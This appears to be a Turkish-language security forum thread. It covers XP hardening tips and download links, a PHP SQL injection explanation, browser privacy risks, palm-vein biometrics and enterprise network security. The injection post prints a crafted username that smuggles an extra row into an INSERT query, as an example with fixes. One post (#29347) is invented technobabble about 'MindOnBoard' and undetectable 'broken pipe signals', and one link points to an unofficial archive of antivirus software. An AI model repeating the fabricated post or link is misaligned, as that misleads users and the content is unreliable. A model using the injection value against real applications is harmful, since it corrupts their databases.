    Standart ve Default ayarlar kadar kullanilan internet tarayicisi (Internet Browser) secimi de önem arz etmekte, IE bu konuda icerdigi hatalar bir yana microsoft ürünü olmasindan dolayi hedef tahtasi haline durumunda. Yamalar (Patch) ile her nekadar bu güvenlik riskleri azaltilmaya calisilsada microsoft bu konuda yeterince hizli degil.
    Alternativ tarayicilar kullanmakta fayda var örnegin en fazla 2 ay öncesine kadar final versiyonu yayinlanan „Firefox“ (www.mozilla.org) gibi acik kaynak (Open Source) kodlu bir tarayici olmasi bakimindan programcilar bir güvenlik acigini mümkün olan en hizli sekilde düzeltme ve patchleri yayinlama yönünde hareket ediyor. Yada Opera (http://www.opera.com) tarayicisi da bir alternativ olusturabilir bu durumda. Ancak bu ürünler de artan popularite nedeniyle hedef seciliyor.
    Proje olarak K-lite (Su an icin Sahte isim!)tarayicisinin kaynak kodlarini kullanmak ve kendi tarayicimizi gelistirmek niyetindeyiz bu konuda olusacak proje ve ürünü yakinda paylasmayi dileriz.

    10 öneri ile daha güvenli bir XP listesi:
    Admin yetkileri ile calismayin.
    -Ek olarak FW yazilimi kurun.
    -Mümkünse FW destegi olan bir router kullanin.
    -Windows XP deki Otomatik Günceleme secenegini aktif hale getirin.
    -AV yazilimi kurun ve izleme özelligini aktif tutun.
    -AV yaziliminin güncel olmasina özen gösterin
    -Alternativ internet tarayicisi kullanin.
    -E-Mail programi olarak Outlook ve türevlerini kullaniyorsaniz alternativ program kullanin.
    -Sisteminizdeki yazilimlarin güncelemelerini kontrol etmeyi aliskanlik haline getirin.
    -Bilgisayarinizi belirli araliklar ile taramayi aliskanlik haline getirin.

    Firewall linkleri:
    Sygate: http://wcarchive.cdrom.com/pub/simt…/secsys/spf.exe
    MacAfee: http://download.mcafee.com/products…9.0/VSP_9_0.exe
    Keiro: http://www.kerio.com/kerio.html
    Genel bir liste:
    http://www.tucows.com/naap_firewalls_default.html
    “Orko”nickli kullanicinin önerisi: http://www.agnitum.com/download/outpostpro.html

    Antivirus linkleri:
    F-Secure: http://esd.element5.com/demoreg.htm…69&languageid=1
    Kaspersky: ftp://downloads-us2l.kaspersky-labs…sonalpro_en.exe
    Bitdefender: http://www.bitdefender.com/bd/site/products.php?p_id=24
    Prevx: http://www.prevx.com/prevxhomedownloadnow.asp
    Genel bir liste:
    http://www.tucows.com/virus95_default.html
    “Orko”nickli kullanicinin önerisi:
    http://rakker.srv.hu/NOD32.v2.12.3.rar

    #29345

    SQL değiştirme savunması çok kolay bir tehlikedir. Fakat birçok uygulama hala risk taşımaktadır. Aşağıdaki örnekte basit bir SQL sorgusu vardır.

    [PHP]
    INTO users (reg_username,
    reg_password,
    reg_email)
    VALUES (‘{$_POST}’,
    ‘$reg_password’,
    ‘{$_POST}’)”;

    ?>[/PHP]

    $_POST kullanılıyor. Bu sorgunun basitçe bir kullanıcı hesabı açma işlemi olduğunu düşünelim. Kayıt işleminde geçici bir şifre oluşturulup kullanıcıya mail atıldığını düşünelim. Artniyetli bir kullanıcı kullanıcı adı yerine aşağıdaki metni girdiğinde:

    [PHP]
    bad_guy’, ‘mypass’, ”), (‘good_guy[/PHP]

    Bu herhangi bir veri kontrolünden geçirilmediğinde direk olarak SQL sorgusunda aşağıdaki gibi bir değişiklik oluşturur :

    [PHP]
    INTO users (reg_username,
    reg_password,
    reg_email)
    VALUES (‘bad_guy’, ‘mypass’, ”), (‘good_guy’,
    ‘1234’,
    ‘shiflett@php.net’)”; ?>[/PHP]

    Bu durumda sorgu bir hesap oluşturması gerekirken iki hesap oluşturacak.

    Bu örnek çok zararlı görülmeyebilir. Artniyetli kişi SQL değiştirmeyi başardığı zaman yapabileceği SQL dilinin yapabilecekleri ile sınırlıdır.

    Bazı veritabanlarında aynı anda birden fazla SQL cümlesi gönderilebilir. Böyle durumlarda saldırgan gerçek sorguyu sonlandırıp istediği sorguyu çalıştırabilir.

    MySQL öntanımlı olarak birden çok sorgu cümleciğinin aynı anda işlenmesine izin vermemektedir. Yeni sürümlerde birden fazla sorgu PHP eklentisi (ext/mysqli) yerine mysqli_multi_query() kullanılarak gönderilebilir. Tek sorgu ile çalışılması ve çoklu sorgu işelemeye izin verilmemesi tehlikeyi azaltır.

    SQL değiştirmeyi engellemek için :

    * Dışardan alınan bütün verileri kontrol edin.

    Bu cümle tekrar edildiği kadar önemlidir. Sıkı bir kontrol birçok tehlikeyi başlamadan engeller.

    * “‘” kullanın.

    Eğer veritabanı izin veriyorsa (MySQL verir) SQL içindeki bütün değerleri “‘” içine alın.

    * Çakışmayı kontrol edin.

    Bazen normal metinlerde SQL benzeri metin parçaları olabilir. Bu tür durumlarda veritabanının bunu ayırt etmesi için mysql_escape_string() yada veritabanının sağladığı fonksiyonları kullanılmalıdır. Eğer veritabanı böyle bir fonksiyon sağlamıyorsa addslashes() son çare olarak kullanılabilir.

    #29346

    – HTTP Protokolü ve Gizlilik

    HTTP protokolü geliştirilirken amaç sadece bilgileri düzgün bir biçimde kullanıcılara sunabilmekti.Bir HTTP requesti yapıldığında (örnek olarak IE ile bir html dosyası alınırken) aşağıdaki sonuç alınır:

    GET /index.html HTTP/1.1
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
    Referer: http://www.turkzine.com/arsiv/index.html
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.0)
    Host: 212.52.101.28:80
    Connection: Keep-Alive

    Websunucusuna bir tcp/ip bağlantısı yapıldığında sizin ip adresiniz alınır ve size cevap gönderilir.Yukarıda gördüğünüz bütün bilgiler kolaylıkla alınır ve websunucusunda saklanır.Ayrıca o siteye birisi link vererek sizi gönderdiyse o adresde(referer) sunucuda saklanır.

    IP adresiniz (siz saklamadıkça) web sunucusunun size dataları göndermesi için daima sunucuya verilir.İşte bu nedenle anonymous proxy sunucuları yapılmıştır.Bu tip anonymous proxy sunucularını kullanarak(ya da socks4,telnet session) ip numaranızın sunucu tarafından loglanmasını engelleyebilirsiniz.Fakat bu işlem sizin tam anlamıyla gizliliğinizi sağlayamaz.

    HTTP requestinde Referer olarak geçen kısım,sizi o siteye gönderen adrestir.Bu bazı durumlarda sorunlara yol açabilir(şifreleri adresler,http protokolü üzerinde çalışan admin servisleri,vb).Bu nedenle kullanacağınız anonymous proxy sunucusunun HTTP requestlerinde refereri göndermemesi çok önemlidir.

    HTTP protokolünde “Basic HTTP Authentication” standart olarak kullanılarak sizin bir siteye login olmanızı sağlar.Fakat bu işlemde kullanıcı adı ve şifreler crypt edilmeden gönderilir ve sizin bağlantığınızı sniff eden biri tarafından rahatlıkla bulunabilir.

    HTTP protokolünden kaynaklanan bu problem SSL ile bağlantı yapan serverlarda sorun çıkarmamaktadır.

    – Otomatik Olarak Çalıştırılan Programlar

    Tarayıcılar,bazı yazılımlar tarafından bir dosya yüklendiğinde otomatik olarak ilişkilendirilen program tarafından açılması için ayarlanabilir.Bu işlem, dosyanın açıldığı bilgisayarda büyük bir probleme neden olabilir.

    – JavaScript ve Benzeri Scripting Teknolojileri

    JavaScript, web yayıncılarına HTML’de olmayan bir çok fonksiyonu yapabilmelerine olanak tanıyor.Bu özellik ile web yayıncıları dinamik web siteleri yaratabiliyorlar.Tabii ki bu scriptlerin çalışması için browserinizda bu özelliği açmanız gerekiyor.JavaScripting i aktif ettiğiniz zamanda web üzerindeki gizliliğinizden bir parça daha koparmış oluyorsunuz.

    Javascript,VBScript ve benzeri diller ile web yayıncısı o dilin kodlarını bilgisayarınız üstünde çalıştırabiliyor.Tabii çalıştırılan bu kodlar,teoride sizin bilgisayarınızda bulunan dosyaları okuma,yazma ve silme gibi özelliklerle sınırlandırılmış.

    Javascript ile, HotMail ve Yahoo gibi webmail servislerinde hesabı olan kullanıcılar bir mail aldıklarında,o maili gönderen kişinin istediği bir sayfaya yönlendirilebiliyorlardı.Yönlendirilen sitede kullanıcının şifresini tekrar girmesini isteyip,o kişinin şifresini ele geçirebiliyorlardı.

    – Java Problemleri

    Java ile yazılan kodlar, Java Virtual Machine üzerinde işletim sistemi tanımaksızın çalışma özelliğine sahipti.Bu özelliği sayesinde java popüler web tarayıcılarına eklendi.Önce Netscape ve ardından Internet Explorer java ile yazılmış kodları çalıştırmaya başladı.Java çalıştırabilme özelliği tarayıcılara eklendikten sonra kullanıcıların aldığı risk bir kat daha arttı.Örnek olarak, Internet Explorer 5.5’de çalıştırılan bir java kodu,tarayıcıya local java kodu olarak tanıtıldığında sistemde büyük bir güvenlik açığına yol açabiliyordu.

    Java ile ilgili başka bir açıkta,Brown Office adıyla piyasaya sürülen ve Netscape tarayıcılarının http sunucusu gibi,internet exploreri ise proxy sunucusu olarak çalıştırabiliyordu.

    – Çerezler (Cookieler)
    Cookieler sayesinde bir webmaster sitesine gelen ziyaretçinin bilgisayarında bir çok bilgiyi saklayabilir.Bu özellik webmasterın bilgisayarınızda bulunan bütün cookilere okuma/yazma hakkına sahip olduğunu göstermez.

    Cookilerden oluşan en büyük problem bir webmasterın,başka bir site tarafından oluşturulmuş bir cookieyi okuyabilmesidir.Bu nedenle websiteleri asla şifreleri,kredi kartı numarlarını cookielerde saklamamalı ve kullanıcılar hangi domainlerin cookielerini okuyabileceğini ayarlayabilmeli.

    Ayrıca cookielerden oluşan başka bir problem ise Netscape browserinin bir javascript ile sistemdeki html dosyalarını okuyabilmesiydi.

    – ActiveX Teknolojileri

    ActiveX dosyaları HTML dosyasına tagi,javascript ya da vbscript ile eklenmektedir.ActiveX ile bilgisayarınızda bulunan dosyalara erişilebilmektedir.

    En büyük problem,web browserlar tarafından kullanılmayan fakat activex’te güvenli olarak tanımlanan hard diskteki dosyalara erişim özelliği.

    Microsoft Internet Explorer 5.01 için yazılmış bir exploit,ActiveX ayarları aktif edilmemiş olsa bile Microsoft Office yazılımları ile o bilgisayarda çalıştırtılabiliyordu.

    ActiveX teknolojisi ile bilgisayarınızda virus taraması bile yapılabiliyor.Bu işlem ile bilgisayarınızı tamamen karşı tarafa teslim etmiş oluyorsunuz.

    – Çözümler
    Bütün bu problemlerden kendinizi korumak için en güvenli yol,size gönderilecek olan dataların bir proxy sunucusu tarafından filtrelenmesidir.Ayrıca ip numaranızı devamlı olarak değiştirmek isterseniz anonymous surf yazılımlarını kullanabilirsiniz.Bilgisayarınıza kuracağınız bir proxy sunucusu ile sizden gönderilen bilgilerin(şifreleriniz,adınız,vs) hepsini kontrol edebilirsiniz.

    Ayrıca bir proxy sunucusu ile ActiveX objelerini kontrol edebilir,embed edilmiş script taglerini,img tagi içine eklenmiş javascript kodlarını filtreleyebilirsiniz.

    #29347

    [align=center]Dns ve Share Ip guvenligi [/align]
    Netgroup Yada WorkGroup calisan ve calistirilan bilgisayarlar icin goz adi edilen yada bilinmeyen bir tehlike soz konusudur..Bu tehlike normal Ip sahibi baglantilarda ozelliklede Sdl ( A – T – Z ) iletisim suruculerinde kendisine daha iyi bir zemin hazirlamakta ve MindOnBoard sistemi ile kendisini desifre ederek MainBoard ve OEM icin yikici sonuclar vermektedir..
    Daha cok EXE. ileticileri ile desifre islemini tamamlayan bu Broken pipe sinyaller Virus tada Troj binary code sistemine dahil olmadigi icin anti-virus programlari tarafindan infect konumuna alinmazlar. Bu durumdan muzdarip olan kullanicilarimiz icin onerimiz su olacaktir .. http://www.microsoft.com resmi sitesine giderek gerekli olan Firewall Patch lerini indirebilir yada bildikleri Firewall guvenlik duvarini isletim sistemi uzerine kurarak kendilerini kurtarabilirler.Onerim 25000 – 150000 Cozunumlu bir firewall kullanmanizdir…!!!

    #29348

    Fujitsu`dan “Avuç içi Güvenlik“
    Dünyanın en büyük teknoloji devlerinden birisi olan Japon Fujitsu firması tarafından geliştirilen “temassız avuç içi güvenlik sistemi’nin” kullanımı hızla yaygınlaşıyor. Yetkililer bu sistemle artik her türlü kart ve şifre güvenliği sorununa son verilecegini belirtiyorlar…

    Kredi veya banka kartlariniz sizce ne kadar güvenli? Kartlarinizin sifrelerinin baskaları tarafından kolayca ele geçirilme riski ne kadar? Sanırım buna herkesin verecegi cevap aynı olacaktır…

    Yetersiz…Hemen her alanda kullandığımız bilgisayar teknolojisinde kullanılan en guvenilir sistemler dahi gunumuz şartlarında maalesef yeterli olmuyor… Hemen hergün bir dostumuzun veya bir akrabamızın başına gelmiş kredi kartları veya banka hesaplarıyla ilgili bir sorun duyarız günlük hayatımızda…

    İster bankalar olsun isterse onların guvenliklerini sağlamaya çalışan güvenlik şirketleri olsun maalesef günümüzde meydana gelen kredi kartı şifrelerinin çalınmasına veya çalınan bir kartın şifresinin bir başkası tarafından kırılarak hesaplarda yapılan hırsızlıklara engel olunamamakta…

    İşte bu ve bunun gibi olaylara son vermek amaciyla guvenlik sistemleri alanında çalismalarini sürdüren Japon Fujitsu firmasi yeni “temassız avuç içi güvenlik sisteminin” yakın bir gelecekte tüm bu dertlerin çözümü olmaya aday… Son derece güvenli ve hızlı olan bu sistemde hata payı %0.01…

    Her insanın, hatta elin farkli avuç içi damarlarına sahip olduğunu, avuç içi damarlarının her insanda farkli bir şekilde bulunması ve bu damarların derinin altında olması sebebiyle sistem sayesinde hiç kimsenin bir başkasının güvenliğini tehdit edemeyeceğini belirten Fulitsu yetkilileri, bu sistemde sahtecilik olmasının
    çok güç olduğu belirtiyorlar.

    Uzun yıllardır üzerinde çalışılan avuç içi güvenlik sisteminin bir diğer özelliği ise kullanıcıyla makinanın temas etmemesinden dolayı son derece hijyenik olmasi…

    Dünyanın bir çok yerinde ve Japonya ‘da bir cok alanda kullanılan sistem Ekim 2006 tarinde Japonya’nin Naka şehrinde açılacak olan yeni şehir kütüphanesinde de kullanıma sunulacak…

    Alanında dünyada ilk defa uygulanacak olan sistemle kütüphaneye gelen ziyaretcilerin artık kart taşıma derdine son verileceği bildirildi…

    Kart kullanımını tamamen ortadan kaldıran bu sistemle artik şifre hatırlama gibi bir dert de yok…

    Yani guvenliginiz sadece ve sedece avuçlarınızın içinde…
    Peki sistem nasil calisiyor? Kütüphaneye üye olmak isteyen kişiler öncelikle avuçlarının içi özel bir tarayıcı ile kopyalanıp depolanıyor…

    Daha sonraki ziyaretlerde kulanıcı kütüphaneye geldiğinde sadece avucunu makinanın üzerinde birkaç saniye bekleterek tarama işlemi gerçekleştiriliyor…

    Parmak izi alınarak veya goz retina taraması sitemlerinin uygulama olarak zorluklarının olması, bu uygulamanın çok yakın bir geleçekte hayatımıza yaygın bir biçimde girecegini gösteriyor…

    Kisa bir zaman içide cep telefonlarından evde kullandığımız her türlü elektronik alete kadar kullanılabilecek bu sistemle tül güvenliğiniz kendi avuçlarınızın icinde…

    #29349

    1. Kurumsal ağ kaynaklarınızı iç ve dış tehditlere karşı korumak
    Günümüzde kurumlar için yerel ağ kavramı artık, iç ağ/dış ağ ayrımı yapılmaksızın, kurumdaki herhangi bir kişiye, herhangi bir yerden erişebilmek anlamında genişlemiştir. Ama bu gelişime paralel olarak, güvenlik uzmanları da ağlarına karşı olan tehditlerle başa çıkabilmek için daha komplike güvenlik politikaları uygulamak zorunda kalmaktadır. Bu tehditleden en başta geleni, önemli ağ kaynaklarını Internet’ten veya yerel ağdan gelebilecek muhtemel saldırılara karşı korumaktır.

    Ağ üzerinden erişim kontrolü, mevcut ağ kaynaklarını korumak için temel yoldur. Ölçeklenebilir kapsamlı erişim denetimi kuralları sayesinde, ağ güvenliği yöneticileri ağ bağlantıları için kaynak sistem, hedef sistem, ağ trafik türü ve uygulama zamanını belirlemek suretiyle esnek ağ erişim hakları belirleyebilirler.

    Ağ güvenliğini korumak tabi ki sadece spesifik kaynaklara erişim denetimi sağlamaktan ibaret değildir. Bundan başka, komple bir ağ güvenliği çözümü aşağıdakileri sağlamalıdır:

    · Ağ kullanıcıların kimliklerinin belirlenmesi
    · Aktarım esnasında veriyi şifreleme
    · Kayıtlı IP’leri optimize şekilde kullanma
    · Ağ trafiğinin tümünün içeriğine güvenlik politikasını uygulama
    · Saldırıları gerçek zamanlı olarak belirleme ve önlem alma
    · Denetim bilgilerinin tümünün kayıtlarını tutma

    Ayrıca güvenlik politkası, kurum içerisinde kullanılan mevcut ve ileride kullanılması muhtemel bütün uygulamalara tatbik edilebilmeli ve bağlantı sorunlarına, ağ performans düşüklüklerine yol açmamalıdır.

    2. Mobil ve uzak kullanıcılar için ağ bağlantısı sağlamak
    Birçok şirket uzak kullanıcılarının bağlantıları için, büyük modem bağlantıları gerektiren geleneksel uzaktan erişim çözümleri ve pahallı dial-up telefon bağlantıları ile karşılaştırıldıklarında çok ekonomik çözümler sunan Internet üzerinde geliştirilen ağ uygulamalarının farkına vardılar. Uzak ve mobil kullanıcılarını kurumsal ağlarına Internet bazlı özel sanal ağlar (VPNler) aracılığı ile bağlamak isteyen firmaların sayısı arttıkça, bu kritik bağlantıların güvenliğinin sağlanması da büyük önem kazanmıştır.

    Bilgilerinizin Internet gibi herkese açık ağlar üzerinden iletimi sırasında güvenliğinden emin olabilmek için iki temel unsurun yerinde uygulanması gerekir. Birincisi, hem uzak istemci, hem de kurumsal Internet ağgeçidi seviyesinde mümkün olan en güçlü tanılama sağlanmalıdır. İkincisi ise, bütün kullanıcı kimlikleri belirlendikten sonra, bütün veri trafiği gizlilik açısından şifreli olarak iletilmelidir.

    Hem tanılama hem de şifreleme uygulamaları, ağ güvenlik çözümü çerçevisinde kesintisiz ve uyumlu olarak çalışmalıdır. Erişim denetimi gibi ağ güvenlik kriterleri sanal özel ağ iletişimlerinde de çok önemli role sahiptir. Uzak bir kullanıcının VPN ile kurumsal ofisine bağlantı kurması demek, buradaki tüm ağ kaynaklarına erişim hakkı kazanması anlamına gelmemelidir.

    Bir firma için uzak ağ bağlantı ihtiyacı arttıkça, ağ güvenlik yöneticileri yönetilebilir ve kullanımı kolay VPN çözümlerine ihtiyaç duyarlar. Ve seçilecek çözüm, kurulumu kolay, ileride eklenebilecek yüksek sayıda uzak kullanıcı sayısını destekleyebilecek esneklikte, son kullanıcı için ise kesintisiz ve transparan olmalıdır.

    3. Internet’i kullanarak kurumsal veri iletişim masraflarını düşürmek
    Güvenli ağ erişimi sağlamak amacıyla istemciler ve ağlar arasında kurulan VPN bağlantıları pahalı çözümler oldukları için, firmalar uzak ofis bağlantılarını sağlamak için Internet aracılığı ile ağlar arası veya bölgeler arası VPN bağlantılarını tercih ederek tasaruufa giderler. Ayrıca herkese açık hatlar üzerinden güçlü tanılama ve veri şifreleme özellikleri kullanarak, bilgi güvenliğinden ödün vermeksizin ticari iletişimleri de sağlamak mümkün olur. Bu sayede, frame-relay ve kiralık hatlara yüksek miktar yatırımlar yapmaya gerek de kalmaz.

    Gözden kaçırılmaması gereken bir konu ise, uzaktan erişim çözümü olarak güçlü tanılama ve şifreleme teknolojileri seçildiği vakit, bu seçimin beraberinde yeni güvenlik yönetimi zorlukları getirebilmesidir. Bu tip muhtemel zorlukları yaşamamak veya minumum seviyeye indirgemek için, tüm VPN bağlantı noktalarını merkezi bir konsol aracılığı ile yönetebilecek güvenlik çözümleri tercih edilmelidir.

    Internet üzerindeki VPN uygulamalarının sağladığı maliyet düşüklüğünün yanı sıra, ağ iletişimlerini özel dedike hatlardan Internet üzerine taşınması, beklenmedik performans düşüklüklerine ve erişim sorunlarına yol açabilir. Bu yüzden, sanal özel bir ağ bünyesinde öncelikli bağlantılar için entegre bantgenişliği yönetimi ve yüksek erişilebilirlik desteklenmelidir.

    4. Güvenli bir extranet üzerinden iş ortaklarına ağ erişimi sağlamak
    Kendinize ait ağ kaynaklarınızı (uzak ve mobil kullanıcılar, branch ofisler) güvenli şekilde birbirine bağladıktan sonra, sıra kurumsal ağınızı extranet uygulamaları aracılığı ile değerli iş ortaklarınıza ve müşterilerinize kontrollü bir biçimde açmaya gelir. Endüstri standartlarında protokollere ve algoritmalara bağlı kalarak gerekli extranet bağlantıları güvenli şekilde sağlanabilir. Ama bu tür bağlantılar için kesinlikle tescilli teknolojiler tercih edilmelidir.

    Internet bazlı VPN uygulamaları için kabul edilen standarda IPSec (Internet Protocol Security) adı verilir. IPSec, şifrelenmiş ve tanılanmış bir IP paketinin formatını ifade eder ve gelecek nesil IP iletişimi için gereklidir. Şifrelenmiş anahtarların yönetimini otomatikleştirmek için genellikle IPSec ile IKE (Internet Key Exchange) ile kullanılır.

    Standart bazlı bağlantı kurulduğu zaman, dışardan erişecek kullanıcıların (iş ortakları, özel müşteriler) ihtiyaçlarına göre özel haklar sadece ilgili ağ kaynakları için tanınmalıdır. Kurumsal ağ kaynaklarının dışarıya açılma oranı arttıkça, bununla ilgili uygulanması gereken kapsamlı güvenlik politikası da periyodik olarak revize edilmelidir.

    5. Kurumsal ağınızın yeterli performansa, güvenilirliğe ve yüksek erişilebilirliğe sahip olması
    Kurumsal ağ bağlantılarında artan Internet kullanımının doğal sonuçlarından biri olan ağ tıkanıklıkları sonucu kritik uygulamalarda performans sorunları yaşanabilir. Ortaya çıkabilecek bağlantı hataları, ağgeçidi çökmeleri, ağ bağlantı gecikmeleri ve diğer performans düşüklükleri neticisinde firmalar büyük ekonomik kayıplar yaşayabilirler.

    Internet ve Intranet hatlarının gereğinden fazla istemci ve sunucu tarafından kullanılması sonucu, trafik miktarına göre bağlantı kopuklukları, zayıf ‘response’ zamanları ve yavaş Internet kullanımı sorunları ile karşı karşıya gelmek normaldir. Bu gibi durumlarda, sınırlı bantgenişliği üzerinde mevcut hattı aktif olarak paylaştırmaya yönelik bir yönetime gidilmelidir.

    Eğer yerel ağınız bünyesinde yoğun trafik yaşanıyorsa, birçok kaynağınız (halka açık popüler bir Web sunucusu gibi ) negatif yönde etkilenebilir. Bir uygulama için bir sunucuya güvenmek, zayıf ‘response’ zamanlarına hatta bağlantı kopukluklarına yol açabilir. Sunucu yük dengelemesi bir uygulama sunucusunun işlevini birçok sunucu üzerine dağıtarak ölçeklenebilir bir çözüm sağlar. Bu yolla ayrıca, sunucular üzerindeki performanslar da arttırılmış olur.

    Performansın yettiği durumlarda dahi, ağgeçidi seviyesinde meydana gelebilecek bir hatayı tolere edebilecek güvenli bir ağ altyapı sistemi oluşturulmalıdır. Günümüzde artık çoğu kurum, ağgecidinde yaşayacakları anlık erişim sorunları yüzünden dahi büyük mali kayıplar yaşaycaklarından emin olarak yüksek erişilebilirliği destekleyen ağ güvenlik ürünlerini tercih etmektedir.

    Yüksek erişilebilirliği destekleyen ürünler hem yazılım, hem donanım bazında yedeklemeli sistemler ile yüzde yüze yakın seviyelerde erişilebilirliği garanti ederler. Bir sorun meydan geldiği zaman, yüksek erişilebilirliği sağlayan bileşenler ağınızın güvenli olmasını sağlamalı ve son kullanıcıya tamamen transparan şekilde devam ettirilmelidir. Gerçek etkili çözümler sunacak ağ yöneticileri, iç ve dış kullanıcılarına daimi güvenilir servisler sağlamalıdır.

    6. Kullanıcı bazında güvenlik politikalarını ağ seviyesinde uygulamak
    Kurumsal ağ konseptinin genişlemesi, birçok ağ için kullanıcı, uygulamalar ve IP adres kullanımı sayılarında aşırı artışlara yol açmıştır. Bu tür dinamik ağ ortamlarında emniyetli ağ politikalarının uygulanması, kullanıcı bazında güvenlik politikalarının oluşturulmasıyla sağlanır. Bu politikalar çerçevesinde, ağ kullanıcıları için kişisel erişim denetimleri, tanılama prosedürleri ve şifreleme parametreleri belirlenir. Yüksek miktarda kullanıcı bilgisi içeren bu uygulamalarla uğraşmak ağ ve güvenlik yöneticileri için bazen kolay olmayabilir.

    Kullanıcı seviyesinde güvenlik bilgilerini ölçeklenebilir şekilde merkezi bir yerde depolamak için LDAP protokolü kullanmak en uygun çözümdür. LDAP sayesinde, bütün kullanıcı bilgileriniz tek bir veritabanında tutulup diğer ağ uygulamaları tarafından paylaşılır. Bununla birlikte ağ ve güvenlik yönetimleri paralel çalışarak güvenlik ile ilgili zaman harcatıcı rutin prosedürlerin aşılması sağlanır.

    Güvenlik denetimlerini en üst düzeyde tutmak için kullanıcı seviyesinde uygulanan güvenlik politikaların kayıtlarının tutulması ve bunların denetlenmesi gerekir. Kişisel güvenlik politikalarının uygulandığı ortamlarda DHCP protokolünün kullanılması etkili bir yol değildir. Bunun sebebi IP adres atamalarının dinamik olarak yapılmasıdır.

    7. Ağınıza karşı yapılan atakları ve şüpheli aktiviteleri anında algılamak ve bunlara cevap vermek
    Kurumsal ağ güvenliğinizi ancak ağınızı ve kullanıcılarınızı korumak için uyguladığınız güvenlik politikaları belirler. Ağ korumanızı devamlı olarak ayakta tutmanın yolu yetkisiz aktiviteleri gerçek zamanlı olarak tespit etmektir.

    Etkili bir saldırı tespit sistemi, atak ve şüpheli ağ aktivitelerini yetkin bir şekilde tespit ederek kurumsal ağ güvenliğinizin bir bacağını oluşturur. Ama bu istenmeyen trafiğin sadece saptanması yeterli değildir. Kullandığınız saldırı tespit uygulaması öte yandan belirlenecek bu tür istenmeyen bağlantılara anında yanıt verebilmeli ve ağ kaynaklarına yetkisiz erişimi engellemelidir.

    İyi dizayn edilmiş bir saldırı tespit uygulaması, gerçek zamanlı karşılıklara ek olarak kapsamlı kayıt tutabilme, komple denetim ve gerektiğinde ilgili kişileri ikaz edebilecek gelişmiş uyarı mekanizmalarına sahip olmalıdır.

    8. Ağınızın IP adres altyapısını güvenli ve etkili bir biçimde yönetmek
    Ağlar üzerindeki kullaınıcı ve uygulama sayısı arttıkça, ağ cihazları ve kullanıcıları için gereken IP adres adres sayısı gittikçe daha çok artmaktadır. Buna paralel olarak da hızlı gelişen ağlarda IP adres ve isim alanı yönetimi zorlaşmaktadır.

    Eskisi gibi her bilgisayar ve ağ cihazının IP adres konfigürasyonunu manuel olarak kontrol etmek artık uygulanmamaktadır. Bunun sebebi, bu tip bir yönetimin günümüz ağları üzerinde hataya açık, zahmetli ve entegrasyon eksikli bir yapı oluşturacak olmasıdır. Böyle bir yapı da doğal olarak çok pahalı olmasının yanında, merkezi kontrol, ölçeklenebilme ve güvenilirlikten uzak olacaktır.

    Kurumsal bazlı IP ağ altyapınız için merkezi idare ve esnek yönetim sağlayan IP adres yönetim çözümleri ancak genel ağ altyapısı ile tamamen entegre olduklarında güvenlik politikaları için optimum kullanılmış olurlar. Daha spesifik olmak gerekirse, dinamik paylaşımlı dahi olsalar, mevcut IP adreslerini kullanıcılara birebir olarak eşlemek kullanıcı bazlı daha güçlü çözümler yaratmayı sağlayacaktır.

    9. Entegrasyona yönelik açık platform güvenlik çözümleri kullanmak
    Ağ güvenlik yöneticileri, korudukları ağ üzerinde kullanacakları yazılım uygulamaları ve ağ altyapısında kullancakları donanımları baş döndürücü bir devinim içinde gelişen bilişim teknolojileri pazarından seçmektedirler. Bu noktada dikkat edilmesi gereken husus, bütün ürünlerin birbirleri ile teknik olarak entegrasyon sorunu olamaksızın yüksek performans ile çalışması gerekliliğidir.

    Alternatif olarak, seçeceğiniz çözümleri geniş yelpazede çalışan üretici tek bir firmadan temin edebilirsiniz. Bu sayede ürünlerin sistemleriniz üzerinde entegrasyon sorunu olmadan çalışacağından emin olabilirsiniz ama bu aşamada da tercih edebileceğiniz uygulama sayısında daralma yaşarsınız. Bütün güvenlik ihtiyaçlarınızı temin edebilecek spektrumda hizmet veren tek bir üretici firma bulmanız pek muhtemel değildir.

    Ağ güvenliği için tercih edeceğiniz çözümler neler olurlarsa olsun, hepsinin seçiminde açık mimari platformu destekleyecek çözümler olmalarına dikkat edilmelidir. İyi tanımlanmış arayüzlere sahip açık bir mimari, genel güvenlik politikası çerçevesinde kullanılacak bütün ürünlerin birbirleri ile sorunsuz çalışmasını sağlayacaktır. Buna ek olarak size özel ağ güvenlik ihtiyaçları yaratmanız için uygulama programlama arayüzleri (API’ler) kullanılabilirsiniz.

    10. Güvenli bir ağa sahip olmanın maliyet ve zahmetlerini azaltmak
    Kurumsal ağınızın güvenliğini sağlamak için, seçtiğiniz çözümleri yönetecek ve denetleyecek kişilere önemli miktarda ücret ödemek durumundasınızdır. Bu yüzden bu kişilerin işlerini, entegre konsollar üzerinden merkezi olarak idare edebilecekleri çözümler tercih edilmelidir. Böylelikle büyük bir kurumsal ağ için dahi, tek bir kişi ağ güvenlik yöneticisi olarak ağ güvenliği denetimi yapabilir. Bundan başka güvenlik politikasında meydana gelecek çözümleri bütün uygulama noktalarına hemen aktarmak gerekir.

    #29350

    Microsoft un yayınladığı 7 adımda Güvenlik Dökümanını Burada Vermeye Çalışacağım arkadaşlar Kolay gelsin.

    Adım 1: Maruz Kalabileceğiniz Tehlikeleri Belirleyin

    Bundan on yıl önce, insanlar Web’i “harika” olarak nitelendiriyordu. Bugün de öyledir. Ancak bazı yönlerden oldukça tehlikelidir. Gizlilik haklarınız ve bilgisayar güvenliğiniz konusunda istenmeyen sonuçlar doğurabilir

    Korumak istediğiniz unsurlar nelerdir?

    Gizlilik haklarınızın çiğnenmesine, bilgisayar yazılımınızın ve verilerinizin zarar görmesine, başkaları tarafından kötüye kullanılmasına karşı önlem alın, çocuklarınızı (ve onların arkadaşlarını) Internet’ten gelebilecek sakıncalı içerik ve bağlantılardan koruyun.

    Tehlikeleri Belirlemede Kullanılacak Denetim Listesi

    Sizi etkileyebilecek tehlikeleri ve göze alabileceğiniz tehlike düzeylerini belirleyin. Aşağıdaki soruları kendi kendinize yanıtlayın.

    1. Bilgisayarınızı kim kullanıyor?

    Otomobil sigorta şirketleri bir otomobilin kazaya maruz kalma olasılığının süren kişiye ve insanların sürüş biçimine göre değiştiğini bilirler. Sürekli olarak yolda olan otomobillerin veya düşüncesizce kullanılan otomobillerin kaza olasılığı çok büyüktür. Aynı şey bilgisayarınızı kullanan kişi için de geçerlidir.

